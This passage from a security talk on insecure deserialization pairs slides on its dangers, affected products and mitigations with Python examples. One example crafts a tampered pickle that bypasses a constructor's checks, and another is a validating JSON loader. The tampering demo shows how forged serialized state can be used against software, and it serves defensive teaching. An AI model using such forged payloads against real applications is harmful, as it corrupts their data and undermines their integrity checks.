It is recommended in various places, such as O’Reilly’s “C# Cookbook” (2015, 4th Edition)
85. DESERIALIZATION – OTHER DANGERS
Deserialization errors will throw exceptions that may hurt the flow of the application.
86. DESERIALIZATION – OTHER DANGERS
In some languages or implementations, the object is built from reflection, or with “default” language constructors …possibly bypassing any setter or constructor checks
87. DESERIALIZATION – OTHER DANGERS
In other words – can’t assume anything about values and logic!
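An added Python illustration of the constructor/setter bypass just described (not part of the talk; Account and CheckedAccount are constructed for the demo): pickle rebuilds an object with cls.__new__ followed by a __dict__ update, so an invariant enforced only in __init__ or in a property setter is never re-checked on load, unless the class defines __setstate__ and re-applies it there. tampered_pickle stands in for a message body that was not produced by the application’s own constructor, which is exactly the test the talk recommends running against your deserializer.

```python
import pickle

# Constructed demo classes; not from the talk.


class Account:
    """The constructor and the property setter both enforce balance >= 0."""

    created = 0  # counts how often __init__ actually ran

    def __init__(self, owner, balance):
        Account.created += 1
        self.owner = owner
        self.balance = balance  # goes through the property setter below

    @property
    def balance(self):
        return self._balance

    @balance.setter
    def balance(self, value):
        if value < 0:
            raise ValueError("balance must be non-negative")
        self._balance = value


class CheckedAccount(Account):
    """Same class, but re-applies the invariant when pickled state is restored."""

    def __setstate__(self, state):
        # Without this method pickle simply does self.__dict__.update(state).
        self.owner = state["owner"]
        self.balance = state["_balance"]  # setter runs, so invalid state is rejected


def tampered_pickle(cls):
    """Builds a pickle whose stored state violates the invariant.
    The object is created without __init__, as a hostile sender could do."""
    obj = object.__new__(cls)
    obj.__dict__.update({"owner": "mallory", "_balance": -500})
    return pickle.dumps(obj)


def load_naive():
    """Plain Account: neither __init__ nor the setter runs; the bad value gets through."""
    before = Account.created
    acct = pickle.loads(tampered_pickle(Account))
    return (acct.balance, Account.created - before)  # (-500, 0): invariant bypassed


def load_checked():
    """CheckedAccount: __setstate__ re-validates and rejects the tampered state."""
    try:
        pickle.loads(tampered_pickle(CheckedAccount))
    except ValueError as e:
        return str(e)
    return "accepted"


def load_checked_valid():
    """Legitimate state still round-trips through __setstate__."""
    acct = pickle.loads(pickle.dumps(CheckedAccount("alice", 100)))
    return (acct.owner, acct.balance)


if __name__ == "__main__":
    print("naive:", load_naive())
    print("checked:", load_checked())
    print("checked, valid input:", load_checked_valid())
```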
89. DESERIALIZATION – AN INDUSTRY PERSPECTIVE
Critical vulnerabilities found in:
WebLogic
WebSphere
JBoss
Jenkins
OpenNMS
Struts2
Liferay
Coldfusion
Multiple Cisco products
The list goes on.
90. DESERIALIZATION – AN INDUSTRY PERSPECTIVE
Part of OWASP Top 10 2017!
A8 – Insecure Deserialization
It’s technically “A1 – Injection” in 2013, but got its own category in 2017, particularly with all that media buzz (and industry tears)
91. DESERIALIZATION – AN INDUSTRY PERSPECTIVE
Remote Code Execution
“CVSS 10” Vulnerabilities
Complete CIA obliteration
Overwrite/Corrupt Objects
Exceptions, DoS
92. DESERIALIZATION – AN INDUSTRY PERSPECTIVE
“[Java] Serialization was a horrible mistake made in 1997” [1]
Oracle is planning on dropping serialization support in Java.
This does not matter.
[1] https://www.infoworld.com/article/3275924/java/oracle-plans-to-dump-risky-java-serialization.html
97. ADDITIONAL MITIGATION STEPS
TEST your deserializers, even when using well defined white-lists
TEST to fail before object creation
TEST if your deserializer goes through setters and ctors!
If it doesn’t, re-implement logic in deserialization
98. MITIGATION BY AVERSION
If you’re still paranoid, maybe build your own data-to-constructor transformer instead?
Poor performance
Requires work
Secure(?)
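Added example (not from the talk) of the “fail before object creation” and “data-to-constructor transformer” advice above, in Python over JSON: the caller fixes the expected type up front, the document is checked for unknown or missing fields and wrong value types, and only then is the class’s constructor called, so the constructor’s own validation still runs. This is the Python counterpart of the .NET case earlier where the expected generic Type makes deserialization fail on time instead of after the object exists. TestingClass is a constructed stand-in for the talk’s ATestingClass, and the sample documents are constructed.

```python
import json
from dataclasses import dataclass, fields
from typing import Type, TypeVar

T = TypeVar("T")


@dataclass(frozen=True)
class TestingClass:
    """Constructed stand-in for the talk's ATestingClass."""
    id: int
    name: str
    address: str
    items: tuple

    def __post_init__(self):
        # Constructor-level checks: they only help if construction is the last step.
        if self.id <= 0:
            raise ValueError("id must be positive")
        if not all(isinstance(i, str) for i in self.items):
            raise TypeError("items must be strings")


class DeserializationError(Exception):
    """Raised before any object of the target class is created."""


def from_json(cls: Type[T], text: str) -> T:
    """Data-to-constructor transformer: the expected type is fixed by the caller,
    the document is checked against it, and only then is the constructor called."""
    try:
        data = json.loads(text)
    except ValueError as e:
        raise DeserializationError(f"not valid JSON: {e}") from None
    if not isinstance(data, dict):
        raise DeserializationError("expected a JSON object")
    expected = {f.name: f.type for f in fields(cls)}
    unknown = set(data) - set(expected)
    missing = set(expected) - set(data)
    if unknown or missing:
        # Unknown keys are refused: the document, not the data, must fit the type.
        raise DeserializationError(f"unknown={sorted(unknown)} missing={sorted(missing)}")
    kwargs = {}
    for name, typ in expected.items():
        value = data[name]
        if typ is tuple:
            if not isinstance(value, list):
                raise DeserializationError(f"{name}: expected list")
            value = tuple(value)
        elif not isinstance(value, typ) or (typ is int and isinstance(value, bool)):
            raise DeserializationError(f"{name}: expected {typ.__name__}")
        kwargs[name] = value
    # Only now is an object created, so the class's own checks run on validated input.
    return cls(**kwargs)


# Constructed sample documents.
GOOD = '{"id": 1, "name": "John Doe", "address": "1 Elm St.", "items": ["Alarm Clock", "Baseball Bat"]}'
WRONG_TYPE = '{"id": "1", "name": "x", "address": "y", "items": []}'
EXTRA_FIELD = '{"id": 1, "name": "x", "address": "y", "items": [], "extra": 1}'
BAD_VALUE = '{"id": -1, "name": "x", "address": "y", "items": []}'


def demo(text):
    """Classifies where, if anywhere, a document is rejected."""
    try:
        obj = from_json(TestingClass, text)
        return ("ok", obj.name)
    except DeserializationError as e:
        return ("rejected before construction", str(e))
    except (ValueError, TypeError) as e:
        return ("rejected by constructor", str(e))


if __name__ == "__main__":
    for doc in (GOOD, WRONG_TYPE, EXTRA_FIELD, BAD_VALUE):
        print(demo(doc))
```

The transformer is deliberately dumb: it knows nothing about classes other than the one it was handed, so a document cannot name a type of its own choosing, and the cost of that is exactly the “requires work” item on the slide (each new field type needs a rule).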
99. CONCLUSIONS
Deserialization is kinda awesome
Too awesome?
Classic automagic!
Deserialization can be deadly
Still a lot of potential areas to explore
Never trust a deserializer – always test it